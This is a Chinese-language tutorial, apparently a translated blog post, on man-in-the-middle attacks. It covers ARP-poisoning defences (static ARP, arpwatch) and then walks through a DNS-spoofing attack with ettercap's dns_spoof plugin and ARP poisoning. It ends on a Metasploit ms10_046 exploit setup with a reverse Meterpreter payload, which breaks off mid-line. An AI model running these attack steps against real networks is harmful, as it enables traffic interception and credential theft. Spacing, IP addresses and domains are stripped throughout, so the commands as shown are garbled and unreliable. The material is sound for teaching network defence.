中间人攻击之DNS欺骗

在前面的文章（中间人攻击-ARP毒化）中，我们讨论了黑客危险的攻击和实用的 ARP中毒原理。在本文中，我将首先探讨检测和防止 ARP中毒（或ARP欺骗）攻击，然后我将回顾其他的中间人攻击 -DNS欺骗。ARP缓存攻击是一项非常危险的攻击，重要的是在用户中创建安全的意识和分析有效的工具和策略。如果你操作的是小型网络，那么就很容易维护 ARP。但是在大型的网络，维护 ARP是很困难和费事的。在前一篇文章的最后我们讨论了工具和技术，能够被用来检测 ARP缓存中毒攻击。让我们来回顾下每一步 :静态

ARP你可以在网络 ARP表中手动的添加一些信息，一旦信息插入，你就有了静态是非常简单，在你的终端 /CMS中，只需输入：“ arp-s”

ARP映射。输入数据的过程也例子：你现在的

ARP表：root@bt:~#arpAddressHWtypeHWaddressFlagsMaskIfaceether00:22:93:cf:eb:6dCeth0让我们假设一下，我想添加一个新的主机在我的 ARP缓存表中，我输入如下命令：arp-sIPMACroot@bt:~#arp-s00:50:FC:A8:36:F5root@bt:~#arpAddressHWtypeHWaddressFlagsMaskIfaceether00:50:fc:a8:36:f5CMeth0ether00:22:93:cf:eb:6dCeth0root@bt:~#需要注意的是，手动添加 ARP表只适用于当前的会话。当你重新启动计算机，将更新表。如果你想要使用这种方法，那么你可以创建一个批处理文件 /BASH文件，并将它们添加到启动项。ARPwatch(ps：监听ARP记录)这是一个不错的实用程序，已经被用来监测 ARP网络，它能够探测并记录发生更改的网络，同时还发送邮箱详细说明各自的变化。安装过程也是非常简单的。对于

Ubuntu

用户：#apt-getinstallarpwatchroot@bt:~#arpwatch-hVersionusage:arpwatch[-dN]sendmail_path][-p]

[-fdatafile][-a][-maddr]

[-iinterface][-uusername]

[-nnet[/width]][-Rseconds]

[-Q]

[-rfile][-z

[-signorenet/ignoremask]如果需要快速检测就用下面这个命令：arpwatch-iinterfaceroot@bt:~#arpwatch-ieth0检查程序是否在运行：root@bt:~#ps-ef |greparpwatcharpwatch10411014:05?00:00:00/usr/sbin/arpwatch -uarpwatch-Nroot21912165014:54pts/000:00:00grep –color=autoarpwatch

-p接下来的步骤就是 ARPwatch记录日志，这也非常简单，你只需要做得是确定目录，然后读取文件。root@bt:~#cd/var/lib/arpwatchroot@bt:/var/lib/arpwatch#lsroot@bt:/var/lib/arpwatch#cat00:50:fc:a8:36:f576eth000:27:0e:21:a6:1e23eth0所以如果你是网络管理员，那么你应该实施一些策略来监视 ARP表并且保护主机免受 ARP中毒攻击。当然我们要注意，中间人攻击并不局限于一个 ARP欺骗攻击。正如前面提到的，还有许多其他的技术能够执行一个中间人攻击。一个主要的例子就是 DNS欺骗，我们将分析它。DNS欺骗攻击DNS欺骗攻击是一种非常危险的中间人攻击，它容易被攻击者利用并且窃取用户的机密信息。虽然这篇文章可以提供一些新的见解，但重要的是

DNS欺骗是一个一般概念，有无数种方法可以实现一个

DNS欺骗攻击。在一个DNS欺骗攻击中，攻击者可以利用一个漏洞来伪造网络流量。因此，要理解解DNS是怎样工作的。

DNS欺骗攻击，必须理DNS(域名系统

)在互联网中是一个非常重要的协议。它属于

TCP/IP，是一个分层结构的分布式模块，它包含域名的相关信息。它负责在网络上映射域名到他们各自的IP上。DNS定位主机/服务器通过查看友好域名，使用域名系统，DNS将域名和IP地址相互映射。这些设备（路由器、服务器等）连接到你的电脑不能理解一些友好的名称（,他们只了解一个IP地址，而DNS负责翻译它。让我们来看看下面这个图来理解主机和本地

DNS服务器的正常通信。DNS服务器包含着一个主数据库，其中包括信息的 IP地址，因为这涉及到相应的域名。所以在这些正常的通信中，一个主机发送请求到服务器，之后服务器响应正确的信息。如果 DNS没有信息传入的请求，它将发送请求到外部

DNS服务器来获取正确的响应。那么攻击者如何使用中间人攻击来实施 DNS欺骗呢？下图说明了答案：使用DNS欺骗中间人攻击，攻击者将截取会话，然后转移到一个假网站的会话。假如：用户希望访问，并且谷歌的IP地址为，攻击者就可以使用DNS欺骗技术拦截会话，并将用户重定向到假冒的网站，假网站IP可以为任意IP。演示DNS欺骗攻击在本系列的以前文章中我发现 ettercap 是一个很好用来演示 ARP欺骗攻击的工具。当然 ettercap 包含一个DNS插件，非常容易使用哦。打开ettercap GUI，点击"sniff" ，之后再"unified sniffing" 选择自己的网络。单机 hosts，之后扫描整个子网存活的主机。在执行时，我们来编辑文件，以确保它执行正确的 DNS欺骗攻击：microsoftsucks;)redirectittoA*.APTR#WildcardsinPTRarenotallowed默认情况下，ettercap 是重定向到另一个网站的 IP地址，我们来改变它：A*.APTR#WildcardsinPTRarenotallowed是攻击者的 IP地址。确保Web服务器运行在攻击者的机器， 一定要启用 IP转发。 在受害者的电脑查看：C:\>pingPinging[with32bytesofdata:Replyfrombytes=32time=167msTTL=54>Replyfrombytes=32time=167msTTL=54Replyfrombytes=32time=167msTTL=54PingstatisticsforPackets:Sent=4,Received=4,Lost=0<0%loss>,在ettercapGUI 上，选择受害者主机（目标 1）和默认路由器（网关 ,目标2）。点击Mitm---ARPpoisoning ，选择"Sniffremoteconnerctions." 之后点击 "start"-"startsniffing"点击选择"plugins"--"managetheplugins" 在其中选择 dns_spoof。这将会启用 dns_spoof插件来执行DNS欺骗中间人攻击。现在在受害者电脑的 DNS欺骗攻击是：你可以看到，在 DNS已经成功欺骗时，所有会话被转移到了攻击者的主机，而不是真正的微软服务器。这个演示是基于

GUI的ettercap

，你也可以使用命令行版本。让我们考虑一个快速演示

DNS欺骗的命令行接口。选择etter 。查看Dns使用简单的命令：root@bt:~#locate/usr/local/share/videojak//usr/share/ettercap/root@bt:~#现在你可以使用你喜欢的文本编辑器来编辑这个文件。 你可以使用文本编辑器 nano或者其他任何你想要的root@bt:~#gedit/usr/share/ettercap/root@bt:~#nano/usr/share/ettercap/当你完成了保存这个文件，现在做好了准备。我们需要做得就是通过

ettercap

启用

DNS欺骗攻击

:root@bt:~#ettercap-T -q -Pdns_spoof-Marp. (Ethernet)eth0-> 00:1C:23:42:8D:0428plugins39protocoldissectors53portsmonitored7587macvendorfingerprint1698tcpOSfingerprint2183knownservices|==================================================>|%4hostsaddedtothehostslist...ARPpoisoningvictims:GROUP1:ANY(allthehostsinthelist)GROUP2:ANY(allthehostsinthelist)StartingUnifiedsniffing...TextonlyInterfaceactivated...Hit'h'forinlinehelpActivatingdns_spoofplugin...让我们来拆开命令结构，来分析 DNS欺骗攻击所用到的命令：-P 使用插件，这里我们使用的是 dns_spoof-T 使用基于文本界面-q 启动安静模式（不回显的意思）-M 启动ARP欺骗攻击. (Ethernet)eth0-> 00:1C:23:42:8D:04SSLdissectionneedsavalid'redir_command_on'scriptinthefilePrivilegesdroppedtoUID65534GID65534...28plugins39protocoldissectors53portsmonitored7587macvendorfingerprint1698tcpOSfingerprint2183knownservicesRandomizing255hostsforscanning...Scanningthewholenetmaskfor255hosts...|==================================================>|%4hostsaddedtothehostslist...ARPpoisoningvictims:GROUP1:00:16:41:ED:6A:D0在另一个例子中，你可以使用特定的接口来执行

dns欺骗攻击。为此，可以使用如下命令：root@bt:~# ettercap -T -q -i eth0-Pdns_spoof-Marp.oPYo.o8P.oPYo.o8o8P8'888oooo88.oooo8Yb..88888888888.888'Yb.8888888888`Yooo'8`YooP8 `YooP'8YooP'8`YooP'88

.oPYo.

.oPYo.8.oPYo...:..:..:.....:::..::.....::.....:8.....:..:.....::..::..:::::::::::::::::::::::::::::::::::8:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::=[metasploit[core:api:]----=[684exploits-355auxiliary----=[217payloads-27encoders-8nopsmsf>usewindows/browser/ms10_046_shortcut_icon_dllloadermsfexploit(ms10_046_shortcut_icon_dllloader)>setSRVHOSTSRVHOST=>msfexploit(ms10_046_shortcut_icon_dllloader)

>setPAYLOADwindows/meterpreter/reverse